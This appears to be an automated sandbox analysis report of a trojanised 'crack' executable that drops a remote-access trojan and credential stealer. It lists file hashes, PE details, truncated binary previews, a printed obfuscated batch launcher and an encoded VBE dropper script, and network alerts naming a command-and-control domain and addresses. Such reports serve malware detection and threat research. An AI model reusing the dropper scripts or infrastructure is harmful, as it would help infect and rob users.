Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\uQMeEZWw.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wSzMZIas.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\portsurrogateFontCrt\BlockcontainerWin.exe

Download File

Process:	C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2545152
Entropy (8bit):	7.696493390112077
Encrypted:	false
SSDEEP:	49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
MD5:	B3F6318C958712D0C78B5A969EE2EFD1
SHA1:	ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
SHA-256:	E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
SHA-512:	67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......\|.......................V.&......................................0..........(.... ........8........E....)...N..........8$...(.... ....~f...{i...:....& ....8....(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z....~....(

C:\portsurrogateFontCrt\e84a5a158d617e

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	ASCII text, with very long lines (363), with no line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	5.849483565001641
Encrypted:	false
SSDEEP:	6:+jYp8fWMD9u4nHyPcKAlV6r6LVyngrZbd+Rzu8wcuNMmWFAJ3zUTaJkuIP:+xfWiDS7Aly6LVyniR+Ju8xuhRzUTac
MD5:	7281239AA8C7F2418BC47A72C40C91E4
SHA1:	F006BFFCD5D3FBF23FA04ACB6EE26FA97369DCEC
SHA-256:	970E7E70556A80FA8E42CEDCF00A28AC395197A2A533C2D14127A174F4CED15B
SHA-512:	458D42D95FC94AF7CB33CED6FCE5CE7CA7748D0353C0BE077EB8E50C0FDCE7E2698710F6212101819F80C5B34D17DFC837FB8F580AE4C87588DDB6A1913F2B9F
Malicious:	false
Preview:	vz5jhH9xgFsFG7kkYkhDida1P4tpAzwPD2nGW3UwTeX78V1BySWO4ZxRZDTmYUwrSdCNTdOePuuDFc24Cr0sciUoFVrSjrY9rqpfTorVD19JptM6LZjqdEOuIXI8v55hWvWYxXlY9foliK9VJvHKIrfnc5X5gtjH6cx4XxIyxLq8ZmL7YwyAyuZoPs62Aq2Q6gpGXF8WmTX6AgO0tZgu4iTLCIop0QyGTZC37FkTycXeXcnteGIkKHWXMdDPbSfWfQnkeV2ozM6bLyyke4LuHN6LDoqdBV2f6B9GzDPJNev8L4MYpdugHuOSUchzoYneTafJzrvbpBhnb89IcRyikWXMwrwWfaey0RovZCj7rS1

C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat

Download File

Process:	C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.868970971790085
Encrypted:	false
SSDEEP:	3:oAQfVzvAmkgXwU6AjHJREM0X3Ng3Bvn:oAQ9zvGg13HJiMl3B
MD5:	2F3C3A6C3A477313D6AB3D03F90BE8C2
SHA1:	1AFE24A9F578C49B35C34855441455EBE4F04369
SHA-256:	ECFF07D881B76F45AA8142EB1CB8A1E21F8F1F51217968CC623AA7FF4DFB4AEE
SHA-512:	FE223A07EB4B7C8799ECDAF4E149F8D3F902648BDDAA55EFA28095DB2320FF796DD017B3059CBA6282E0E085C7B30AA2A4202105E48C7DA6C40B19484C3C2D8F
Malicious:	false
Preview:	%heePzUeJo%%CJtr%..%jPEE%"C:\portsurrogateFontCrt/BlockcontainerWin.exe"%RdAjJxBZVCA%

C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe

Download File

Process:	C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	211
Entropy (8bit):	5.7766808097008155
Encrypted:	false
SSDEEP:	6:GEwqK+NkLzWbHK/818nZNDd3RL1wQJRAZI80IqwM1Gkxs:G1MCzWLKG4d3XBJGi80Twku
MD5:	0B67BF20E24EAC268C690E05E9E59711
SHA1:	2768696C3FFF8AADE04325EAD3AD4366E9393084
SHA-256:	88907A441F365C8D0EC4F523F0F38F97434528CA151B928CF8F1C29DB80AFE8A
SHA-512:	64D956B71DC25615B8DEEA4CE5D8DC3F2B79E7CA6DFA289FB5C73F3FE63E14698A739DDCBB3D257569342D6AFE543AA76837F30499405097B356CDAA17B05FCD
Malicious:	false
Preview:	#@~^ugAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJwGMYkEDMWTCY.sGxDZ.OJz:4uh_LNWU64kc4CYES,!SP6CVk+LzwAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.621947447102293
Encrypted:	false
SSDEEP:	12:PYI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:DdUOAokItULVDv
MD5:	3C2549B8E8B5460A95748CCC3CD1BEA8
SHA1:	99895C6D36EC820FE6A210E186B09AF7CD089696
SHA-256:	EAFA177E97F49A260A5951D5B4EC13790F9D909597F417523B07109A96482BF7
SHA-512:	A75E3251EAD6D1CDDB9D54ED989FCD1817A395745C831BF8EAF70CED5EA62C7B5B957C699391D3664CF401B88E97E2E8112C5C2AB94FEC39B22564A56D6D43D0
Malicious:	false
Preview:	..Pinging 936905 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.636132306906945
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NursultanAlphaCrack.bat.exe
File size:	2'866'940 bytes
MD5:	df15d1f8f7cc71bb1889895b367c7d2c
SHA1:	4a9d087d105976a1f7a1c7444a25b5e0a8ac0622
SHA256:	09bdb3282e1927dcb848126823280b066827c5dadd17ee6d445922440889d8f2
SHA512:	3c5215abd2ca1cee15ae3592eea15cebec2ce0127221c96634ad07ea53cf9fa397bfecd229a56b38c879f2fe6dadfc8bd58ac6541bcfc6eba65017d4b3694e4f
SSDEEP:	49152:IBJVZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rnh:y7oYp9kiHPbCfX4rsu3GQh
TLSH:	C6D5D006A5D19E37C3755B318657023E92A0D7223622EB4F760F25D7AC077F18EB22A7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FCA7CED816Bh
jmp 00007FCA7CED7A7Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FCA7CECA8C7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FCA7CEDAF0Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FCA7CED7C0Ch
push 0000000Ch
push esi
call 00007FCA7CED71C9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FCA7CECA842h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FCA7CEDA9C9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FCA7CED7B88h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FCA7CEDA9ACh
int3
jmp 00007FCA7CEDC447h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:17:13.575913+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	49882	104.21.80.1	80	TCP
2025-01-13T13:17:21.857172+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52220	104.21.80.1	80	TCP
2025-01-13T13:17:36.857189+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52270	104.21.48.1	80	TCP
2025-01-13T13:17:44.589748+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52271	104.21.48.1	80	TCP
2025-01-13T13:17:56.779104+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52272	104.21.48.1	80	TCP
2025-01-13T13:18:10.076013+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52273	104.21.48.1	80	TCP
2025-01-13T13:18:25.076021+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52274	104.21.48.1	80	TCP
2025-01-13T13:18:37.122916+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52275	104.21.48.1	80	TCP
2025-01-13T13:18:45.076063+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52276	104.21.48.1	80	TCP
2025-01-13T13:18:53.576114+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52277	104.21.48.1	80	TCP
2025-01-13T13:19:05.388613+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52278	104.21.48.1	80	TCP
2025-01-13T13:19:13.076114+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52279	104.21.48.1	80	TCP
2025-01-13T13:19:20.732460+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.9	52280	104.21.48.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:17:13.068737984 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:13.073626995 CET	80	49882	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:13.073702097 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:13.074659109 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:13.079519033 CET	80	49882	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:13.420428991 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:13.425332069 CET	80	49882	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:13.521039009 CET	80	49882	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:13.575912952 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:13.756083012 CET	80	49882	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:13.853828907 CET	80	49882	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:13.854115963 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:14.261446953 CET	49882	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:20.318012953 CET	52212	53	192.168.2.9	162.159.36.2
Jan 13, 2025 13:17:20.322856903 CET	53	52212	162.159.36.2	192.168.2.9
Jan 13, 2025 13:17:20.322961092 CET	52212	53	192.168.2.9	162.159.36.2
Jan 13, 2025 13:17:20.360240936 CET	53	52212	162.159.36.2	192.168.2.9
Jan 13, 2025 13:17:20.777503967 CET	52212	53	192.168.2.9	162.159.36.2
Jan 13, 2025 13:17:20.782536983 CET	53	52212	162.159.36.2	192.168.2.9
Jan 13, 2025 13:17:20.783485889 CET	52212	53	192.168.2.9	162.159.36.2
Jan 13, 2025 13:17:21.324980974 CET	52220	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:21.329915047 CET	80	52220	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:21.329997063 CET	52220	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:21.330337048 CET	52220	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:21.335155964 CET	80	52220	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:21.699465990 CET	52220	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:21.704329014 CET	80	52220	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:21.774307966 CET	80	52220	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:21.857172012 CET	52220	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:22.019752026 CET	80	52220	104.21.80.1	192.168.2.9
Jan 13, 2025 13:17:22.169662952 CET	52220	80	192.168.2.9	104.21.80.1
Jan 13, 2025 13:17:22.484901905 CET	52220	80	192.168.2.9	104.21.80.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:17:13.049283028 CET	63531	53	192.168.2.9	1.1.1.1
Jan 13, 2025 13:17:13.062206030 CET	53	63531	1.1.1.1	192.168.2.9
Jan 13, 2025 13:17:20.288316011 CET	53	53038	162.159.36.2	192.168.2.9
Jan 13, 2025 13:17:20.796499968 CET	50978	53	192.168.2.9	1.1.1.1
Jan 13, 2025 13:17:20.803776026 CET	53	50978	1.1.1.1	192.168.2.9
Jan 13, 2025 13:17:36.252859116 CET	58617	53	192.168.2.9	1.1.1.1
Jan 13, 2025 13:17:36.266851902 CET	53	58617	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:17:13.049283028 CET	192.168.2.9	1.1.1.1	0xa678	Standard query (0)	237025cm.n9shteam.in	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:20.796499968 CET	192.168.2.9	1.1.1.1	0x4ef4	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 13, 2025 13:17:36.252859116 CET	192.168.2.9	1.1.1.1	0x4892	Standard query (0)	237025cm.n9shteam.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:16:40.181052923 CET	1.1.1.1	192.168.2.9	0xb84b	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
